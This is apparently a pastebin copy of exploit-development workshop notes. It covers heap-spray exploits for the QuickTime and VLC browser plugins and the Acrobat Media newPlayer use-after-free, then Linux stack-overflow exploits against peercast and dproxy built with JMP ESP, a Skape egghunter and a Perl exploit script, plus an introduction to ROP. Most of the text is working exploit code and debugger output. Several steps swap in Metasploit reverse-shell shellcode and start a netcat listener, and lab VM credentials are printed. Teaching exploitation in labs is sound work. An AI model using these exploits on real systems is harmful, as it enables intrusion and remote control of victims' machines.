- <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
- </object>
- var buf = "";
- for(i = 0; i < 50000; i++)
- buf += "A";
- var myobject = document.getElementById("quicktime");
- myobject.url = buf;
- YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
- - Browsers (Flash)
- - PDF
- - MS Office / OOo
- VLC smb:// exploit
- ------------------
- EXPLOIT VECTOR
- smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
- Exploit Scripts
- - ffvlc
- ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
- perl daemon.pl vlc0.html
- ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
- Browse to http://your_host_ip_address:8080/
- vlc0.html
- ---------
- <script>
- var buf = "";
- for(i = 0; i < 1250; i++)
- buf += unescape("%41%41%41%41");
- var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
- document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
- </script>
- vlc1.html
- ---------
- <script>
- // shellcode created in heap memory
- var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
- // 800K block of NOPS
- var nop = unescape("%u9090%u09090"); // 4 NOPS
- while(nop.length < 0xc0000) {
- nop += nop;
- }
- // spray the heap with NOP+shellcode
- var memory = new Array();
- for(i = 0; i < 50; i++) {
- memory[i] = nop + shellcode;
- }
- // build the exploit payload
- var buf = "";
- for(i = 0; i < 1250; i++)
- buf += unescape("%41%41%41%41");
- var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
- // trigger the exploit
- document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
- </script>
- ---------------------------Type This-----------------------------------
- perl daemon.pl vlc1.html
- -----------------------------------------------------------------------
- Search for where our NOPS+shellcode lies in the heap
- s 0 l fffffff 90 90 90 90 cc cc cc cc
- 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
- 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- Edit vlc2.html
- replace %41%41%41%41 with %07%07%07%07
- (928.fd0): Break instruction exception - code 80000003 (first chance)
- eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
- eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
- 07100000 cc int 3
- 0:019> u
- 07100000 cc int 3
- 07100001 cc int 3
- 07100002 cc int 3
- 07100003 cc int 3
- 07100004 cc int 3
- 07100005 cc int 3
- 07100006 cc int 3
- 07100007 cc int 3
- Create vlc3.html (Copy vlc2.html to vlc3.html)
- ----------------------------------------------
- Win32 Reverse Shell
- - no restricted characters
- - Encoder NONE
- - use the Javascript encoded payload generated by msfweb
- #######################
- # Lab 4: PDF EXPLOITS #
- #######################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
- -----------------------------------------------------------------------
- Acrobat Media newPlayer exploit
- -------------------------------
- Use-after-free bug
- Exploit scripts are online at 172.16.0.100
- - adobe_mnp
- Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
- mnp0.pdf
- - Open up acrobat reader
- - WinDBG
- - F6 attach to AcroRd32.exe
- - g to Go
- EIP = 41414141
- Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
- mnp1.pdf
- All we are doing is changing EIP to 0c0c0c0c.
- There is no heap spray in this one.
- This exception may be expected and handled.
- eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
- eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
- 0c0c0c0c ?? ???
- We know we get EIP control
- mnp2.pdf
- Put in the heap spray.
- var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
- var nops = unescape("%u9090%u9090");
- while(nops.length <= 32768)
- nops += nops;
- nops = nops.substring(0,32768 - shellcode.length);
- memory = new Array();
- for(i = 0; i < 1500; i++) {
- memory[i] = nops + shellcode;
- }
- 1500 NOP+shellcode blocks of 32K NOPs each
- We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
- We want to see what led to the crash.
- EIP is invalid, so we can't disassemble around EIP
- We need to trace the function that called us and crashed.
- - STACK TRACE
- - Dumps all the frames from the top of the stack.
- - show you the series of calls that led up to the crash.
- - we will analyze the topmost function on the frame.
- WinDBG - stack trace - "k" command
- 0:000> k
- ChildEBP RetAddr
- WARNING: Frame IP not in any known module. Following frames may be wrong.
- 0013fb34 2d843117 0x90909090
- 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
- 0013fbdc 23825d8c EScript!PlugInMain+0x25584
- 0013fc74 238257e2 EScript!PlugInMain+0x249dc
- 0013fca4 238543c5 EScript!PlugInMain+0x24432
- 0013fd04 00a78de1 EScript!PlugInMain+0x53015
- 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
- 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
- 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
- 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
- 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
- 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
- 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
- 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
- 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
- 0013ffc0 7c817067 AcroRd32+0x4004
- 0013fff0 00000000 kernel32!BaseProcessStart+0x23
- 2d843117 -- the return address that we would have returned to, if we didnt crash.
- address 2d843117-2 we will have a CALL instruction.
- u 2d843117
- u 2d843117-2
- u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
- u 2d843117-4
- 0:000> u 2d843117-3
- Multimedia!PlugInMain+0x41b66:
- 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
- 2d843117 6a00 push 0
- 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
- 2d84311e 56 push esi
- 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
- 2d843124 83c40c add esp,0Ch
- 2d843127 66b80100 mov ax,1
- 2d84312b 5e pop esi
- We control EDX
- edx=0c0c0c0c
- call [edx+4] = call [0c0c0c10]
- dd edx+4
- 0:000> dd edx+4
- 0c0c0c10 90909090 90909090 90909090 90909090
- 0c0c0c20 90909090 90909090 90909090 90909090
- 0:000> u 2d843117-7
- Multimedia!PlugInMain+0x41b62:
- 2d843110 8b10 mov edx,dword ptr [eax]
- 2d843112 8bc8 mov ecx,eax
- 2d843114 ff5204 call dword ptr [edx+4]
- dd eax
- 0:000> dd eax
- 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
- 02e2d690 42424242 42424242 42424242 42424242
- 02e2d6a0 42424242 42424242 42424242 42424242
- 02e2d6b0 42424242 42424242 42424242 42424242
- 02e2d6c0 42424242 42424242 00000000 00000000
- mnp3.pdf
- change the NOPs 90909090 to 0c0c0c0c
- mov edx, [eax]
- call [edx+4]
- edx = 0c0c0c0c
- edx+4 = 0c0c0c10
- contents at edx+4 will also be "0c0c0c0c"
- EIP will jump to 0c0c0c0c
- and...
- 0:000> u 0c0c0c0c
- *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
- *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
- 0c0c0c0c 0c0c or al,0Ch
- 0c0c0c0e 0c0c or al,0Ch
- 0c0c0c10 0c0c or al,0Ch
- 0c0c0c12 0c0c or al,0Ch
- 0c0c0c14 0c0c or al,0Ch
- ----------------------------------------------------------------------------------------------------------------
- ##################
- # Linux Exploits #
- ##################
- The target virtual machine for these labs can be downloaded from here:
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
- root: exploitlab
- user: exploitlab
- pass: exploitlab
- The attack scripts can be downloaded from here:
- https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
- https://s3.amazonaws.com/secureninja/files/dproxy.zip
- https://s3.amazonaws.com/secureninja/files/asterisk.zip
- ######################################
- # Lab 1: Simple Linux Stack Overflow #
- ######################################
- Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
- ---------------------------Type This-----------------------------------
- cat victim1.c
- gcc victim1.c -o victim1
- ./victim AAAAAAAAAAAAAAAAAAA
- ./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- /usr/local/sbin/peercast
- -open peercast1.py on the XP attack-
- python peercast1.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- /usr/local/sbin/peercast
- -open peercast2.py-
- python peercast2.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- - SSH into the Ubuntu Host (strategicsec:strategicsec) -
- cd /home/strategicsec/toolz/metasploit/tools/exploit
- Now we will run the pattern offset with ruby:
- ruby pattern_offset.rb 42306142
- and
- ruby pattern_offset.rb 61423161
- -----------------------------------------------------------------------
- Distance to EIP is 780
- Relative position of ESP 784
- Now to find a good JMP ESP address with msfelfscan
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/
- ./msfelfscan -j ESP binaries/peercast_binary
- -----------------------------------------------------------------------
- 0x0808fb57 jmp esp <----- we will use this one!
- 0x0808fcc7 jmp esp
- 0x0808ffff jmp esp
- 0x08090057 jmp esp <----- we can't use this one.
- 0x080901df jmp esp
- Now open and edit peercast3.py in notepad++ on our XP Host machine.
- pad_lenth = the distance to EIP
- ret_address = the jmp esp we are using
- ---------------------------Type This-----------------------------------
- python peercast3.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $eip
- x/10i $eip
- quit
- -----------------------------------------------------------------------
- Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
- Linux IA32 Reverse Shell
- LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
- LPORT (Listening Port) – chose a port to run your listener on
- Encoder: Alpha2
- ---------------------------Type This-----------------------------------
- nc -l -p 4321
- python peercast4.py | nc asterisk-vm-ip 7144
- -----------------------------------------------------------------------
- ##################################################################
- # Lab 2: Dealing with a lack of space for your shellcode problem #
- ##################################################################
- DPROXY EXPLOIT - DNS PROXY
- --------------------------
- SSH Login into your Asterisk VM as root
- root / asterisk
- Start dproxy
- /usr/local/sbin/dproxy
- DNS running on UDP port 53
- we will use netcat's UDP mode (-u) for the transport.
- ---------------------------Type This-----------------------------------
- python dproxy1.py | nc -u asterisk-vm-ip 53
- GDB COMMANDS
- gdb -core core.9999 -- load core files
- info registers -- inspect registers
- x/64x $reg -- examine memory at a particular register
- x/64x $esp -- examine memory at ESP
- q -- quit
- x/10i $eip -- disassemble 10 instructions beginning at EIP
- python dproxy1.py | nc -u 192.168.128.140 53
- gdb -core core.8888
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7da8 0xbf9c7da8
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x41414141 0x41414141
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c10: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c20: 0x41414141 0x41414141 0x41414141 0x2e414141
- 0xbf9c7c30: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c40: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c50: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c60: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c70: 0x41412e41 0x41414141 0x41414141 0x41414141
- 0xbf9c7c80: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c90: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7ca0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cb0: 0x2e414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cc0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cd0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7ce0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cf0: 0x41414141 0x41412e41 0x41414141 0x41414141
- PATTERN
- ---------------------------Type This-----------------------------------
- python dproxy2.py | nc -u 192.168.128.140 53
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7da8 0xbf9c7da8
- ebx 0x43377143 0x43377143
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x30724339 0x30724339
- esi 0x71433871 0x71433871
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x432e7243 0x432e7243 <------ messed up EIP
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0x72433272 0x34724333 0x43357243 0x72433672
- 0xbf9c7c10: 0x38724337 0x43397243 0x73433073 0x32734331
- 0xbf9c7c20: 0x43337343 0x73433473 0x36734335 0x43377343
- 0xbf9c7c30: 0x7343382e 0x30744339 0x43317443 0x74433274
- 0xbf9c7c40: 0x34744333 0x43357443 0x74433674 0x38744337
- 0xbf9c7c50: 0x43397443 0x75433075 0x32754331 0x43337543
- 0xbf9c7c60: 0x75433475 0x36754335 0x43377543 0x75433875
- 0xbf9c7c70: 0x30764339 0x43317643 0x76433276 0x34764333
- 0xbf9c7c80: 0x43357643 0x76433676 0x38764337 0x43397643
- 0xbf9c7c90: 0x77433077 0x32774331 0x43337743 0x77433477
- 0xbf9c7ca0: 0x36774335 0x4337772e 0x77433877 0x30784339
- 0xbf9c7cb0: 0x43317843 0x78433278 0x34784333 0x43357843
- 0xbf9c7cc0: 0x78433678 0x38784337 0x43397843 0x79433079
- 0xbf9c7cd0: 0x32794331 0x43337943 0x79433479 0x36794335
- 0xbf9c7ce0: 0x43377943 0x79433879 0x307a432e 0x43317a43
- 0xbf9c7cf0: 0x7a43327a 0x347a4333 0x43357a43 0x7a43367a
- Relative position of ESP
- [ESP] = 0x72433272 - 2077 bytes
- We assume EIP is overwritten at 2073 bytes
- dproxy3.py
- - confirm that we get EIP = 42424242
- - check the stack memory x/64x $esp
- ---------------------------Type This-----------------------------------
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7df5 0xbf9c7df5
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x42424242 0x42424242
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c10: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c20: 0xcccccccc 0xcccccccc 0xcccccccc 0x2ecccccc
- 0xbf9c7c30: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c40: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c50: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c60: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c70: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c80: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- NEXT STEP - GET INT3
- ---------------------------Type This-----------------------------------
- msfelfscan -j esp dproxy_binary
- -----------------------------------------------------------------------
- 0x0804a7ca push esp
- Core was generated by `/usr/local/sbin/dproxy'.
- Program terminated with signal 5, Trace/breakpoint trap.
- #0 0xbf9c7c01 in ?? ()
- ---------------------------Type This-----------------------------------
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7df5 0xbf9c7df5
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0xbf9c7c01 0xbf9c7c01
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $eip
- -----------------------------------------------------------------------
- 0xbf9c7c01: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c11: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c21: 0xcccccccc 0xcccccccc 0xcccccccc 0x2e2ecccc
- 0xbf9c7c31: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c41: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c51: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c61: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c71: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c81: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- USING THE EGGHUNTER - DPROXY5
- [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP | <---truncated
- | |
- 2073 ESP (2077)
- [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP ... NOP NOP 50905090 50905090 SHELLCODE ]
- --------------------------------------old perl version of the code------------------------------------------------------
- # taken from Skape's paper
- $linux_egghunter =
- "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
- "\x31\xC9". # xor ecx,ecx
- "\xF7\xE1". # mul ecx
- "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
- "\x42". # inc edx
- "\x60". # pusha
- "\x8D\x5A\x04". # lea ebx,[edx+0x4]
- "\xB0\x21". # mov al,0x21
- "\xCD\x80". # int 0x80
- "\x3C\xF2". # cmp al,0xf2
- "\x61". # popa
- "\x74\xED". # jz 0x9
- "\x39\x1A". # cmp [edx],ebx
- "\x75\xEE". # jnz 0xe
- "\x39\x5A\x04". # cmp [edx+0x4],ebx
- "\x75\xE9". # jnz 0xe
- "\xFF\xE2"; # jmp edx
- # when you need to use it, use the following EGG:
- $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
- $shellcode = "\xCC" x 500;
- $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
- $buf .= "A" x $distance_to_eip;
- $buf .= pack("V", $eip);
- $buf .= $linux_egghunter;
- $buf .= $nops;
- $buf .= $egg;
- $buf .= $shellcode;
- --------------------------------------old perl version of the code------------------------------------------------------
- Failed to read a valid object file image from memory.
- Core was generated by `/usr/local/sbin/dproxy'.
- Program terminated with signal 5, Trace/breakpoint trap.
- #0 0xbf9c84d1 in ?? ()
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $eip
- -----------------------------------------------------------------------
- 0xbf9c84d1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c84e1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c84f1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8501: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8511: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8521: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8531: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8541: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8551: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8561: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8571: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8581: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8591: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85a1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85b1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85c1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- REPLACE THE INT3 SHELLCODE WITH ALPHA2 ENCODED LINUX IA32 REVERSE SHELL
- EXPLOIT WHICH REACHES INT3
- --------------------------------------old perl version of the code------------------------------------------------------
- #!/usr/bin/perl
- binmode(STDOUT);
- $| = 1; # turn off output buffering
- $distance_to_eip = 2073; # replace this with distance to EIP
- $eip = 0x0804a7ca; # push esp; ret - dproxy binary
- # taken from Skape's paper
- $linux_egghunter =
- "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
- "\x31\xC9". # xor ecx,ecx
- "\xF7\xE1". # mul ecx
- "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
- "\x42". # inc edx
- "\x60". # pusha
- "\x8D\x5A\x04". # lea ebx,[edx+0x4]
- "\xB0\x21". # mov al,0x21
- "\xCD\x80". # int 0x80
- "\x3C\xF2". # cmp al,0xf2
- "\x61". # popa
- "\x74\xED". # jz 0x9
- "\x39\x1A". # cmp [edx],ebx
- "\x75\xEE". # jnz 0xe
- "\x39\x5A\x04". # cmp [edx+0x4],ebx
- "\x75\xE9". # jnz 0xe
- "\xFF\xE2"; # jmp edx
- # when you need to use it, use the following EGG:
- $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
- $shellcode = "\xCC" x 500;
- $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
- $buf .= "A" x $distance_to_eip;
- $buf .= pack("V", $eip);
- $buf .= $linux_egghunter;
- $buf .= $nops;
- $buf .= $egg;
- $buf .= $shellcode;
- print $buf;
- --------------------------------------old perl version of the code------------------------------------------------------
- ###############################################
- # Introduction to Return Oriented Programming #
- ###############################################
- ---------------------------Type This-----------------------------------
- victim2.c
- ---------
- make victim2
- ./victim2 AAAAAAAAAAAAA
- gdb victim2
- disassemble main
- -----------------------------------------------------------------------
- 0x080483c7 <+31>: push 0x4
- 0x080483c9 <+33>: push 0x3
- 0x080483cb <+35>: call 0x8048426 <add>
- We want to set a breakpoint in main() just before add is called.
- We want to inspect the calling frame for add():
- break *0x080483cb
- run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- We are in main()
- - just before call add()
- - we want to look at the stack
- In GDB, you can find out the stack trace by the following commands:
- where
- backtrace
- bt
- ---------------------------Type This-----------------------------------
- (gdb) x/i $eip
- -----------------------------------------------------------------------
- => 0x80483cb <main+35>: call 0x8048426 <add>
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbffffa60: 0x00000003 0x00000004 0xbffffa88 0x0804846b
- ^^^^^^^^^^params^^^^^^^^^^
- stepi <------ single step
- where
- ---------------------------Type This-----------------------------------
- (gdb) where
- -----------------------------------------------------------------------
- #0 0x08048426 in add ()
- #1 0x080483d0 in main ()
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbffffa5c: 0x080483d0 0x00000003 0x00000004 0xbffffa88
- ^^^^^^^^^^ ^^^^^^^^^^ ^^^^^^^^^^
- saved return param param
- address (from
- add)
- THIS IS THE CALLING FRAME FOR add(3, 4)
- ---------------------------Type This-----------------------------------
- export EGG=`./frame1.py`
- gdb victim2
- (gdb) run $EGG
- -----------------------------------------------------------------------
- 0x80484a5 <__libc_csu_init+85>: pop ebx
- 0x80484a6 <__libc_csu_init+86>: pop esi
- 0x80484a7 <__libc_csu_init+87>: pop edi <------ POP/POP/RET
- 0x80484a8 <__libc_csu_init+88>: pop ebp
- 0x80484a9 <__libc_csu_init+89>: ret
- ---------------------------Type This-----------------------------------
- export EGG=`./frame2.py`
- gdb victim2
- run $EGG
- -----------------------------------------------------------------------
- x/100i 0x080483a8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement